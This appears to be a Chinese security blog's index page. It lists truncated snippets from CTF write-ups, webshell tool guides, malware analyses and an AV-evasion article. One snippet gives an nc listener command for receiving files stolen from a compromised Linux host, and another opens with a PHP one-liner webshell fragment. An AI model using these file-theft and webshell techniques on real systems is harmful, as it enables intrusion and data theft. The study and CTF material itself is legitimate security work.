[huayang] 签到_观己 过滤了php意思就无法使用文件包含 [huayang]查看日志文件/var/log/nginx/access.log 有ua显示可以使用一句话 <?php @ev...
【原创】总结一些SQL server知识(标准SQL语句)
[huayang] 使用T-sql创建数据库: create database database_name on primary ( name='', 逻辑文件名 fi...
【原创 超详细】哥斯拉及冰蝎的简单使用
[huayang] 实验环境均以 ctfshow— 文件上传 —web151 进行讲解 哥斯拉 下载地址:https://github.com/BeichenDream/Godzilla/releas...
nc加密盗取文件内容的小技巧
这里简单介绍一下,情况是这样我们入侵Linux之后,植入nc后,想盗取部分内容无法直接传输,因为会遇到防火墙的拦截,这里就需要进行加密传输。黑客端:nc -l -p 8889 > kali.tx...
CTFHUB-WEB前置技能-HTTP协议-基础认证
题目 访问 /flag 发现需要登录 挂上 BurpSuite 的代理,随便输个账号密码(比如: 账号aaa 密码 bbb)访问,查看 HTTP 响应报文: 得到提示 do u konw admin ...
攻防世界-MISC-新手练习区-base64stego
题目 菜狗经过几天的学习,终于发现了如来十三掌最后一步的精髓 解题 下载附件后是一个压缩包,解压缩时提示需要密码,这时候就要思考了,破解密码?在题目中一般都会提示,不然破个吉尔。然后想到伪加密,先用w...
【表哥有话说 第82期】劫持stdout
劫持stdout这一周表哥带来了劫持stdout的知识分享大家准备好了吗???干货分享开始了!!IO leakfile 结构体 amd64: 0...
IOS逆向之某抓包APP
0x00 前言本文的测试目标是一个抓包的APP,可以使用hook的方式或者代理的方式来获取高级功能,如解密HTTPS流量、重写HTTP请求以及重放等功能。由于个人账户(没有付费成为苹果开发者账号)的限...
恶意 HTML 文件 (QBot) 分析
读者 Eric 提交了一个恶意 HTML 页面,其中包含带有恶意软件的 BASE64 图像。让我们来看看。使用我的工具base64dump.py我在 HTML 代码中搜索长 BASE64 字符串:看起...
2022柏鹭杯WP--Polaris战队
Polaris北极星战队本次排名第5,共解出9道题问题描述的密文你会解密吗?:Can you help us decrypt this text?:Anti-Fermat?:UnzipezPython...
Shellcode Loader免杀
前言xdm国庆节快乐,加班结束,终于到放假的日子了正文查找查杀点先放置完整的代码,百分百被杀从头开始,删除发现加载shellcode的时候报毒了去除特征按照网上的做法,有两个函数可以做到execeva...
某次攻防演练中的分析溯源 | 情报
信息收集在某次攻防演练信息收集的过程中,偶然发现伪装Github信息泄漏进而钓鱼红队人员的后门。下面展开有趣的分析溯源过程。GIthub信息泄漏根据甲方信息进行常规的Github敏感信息收集偶然发现一...
16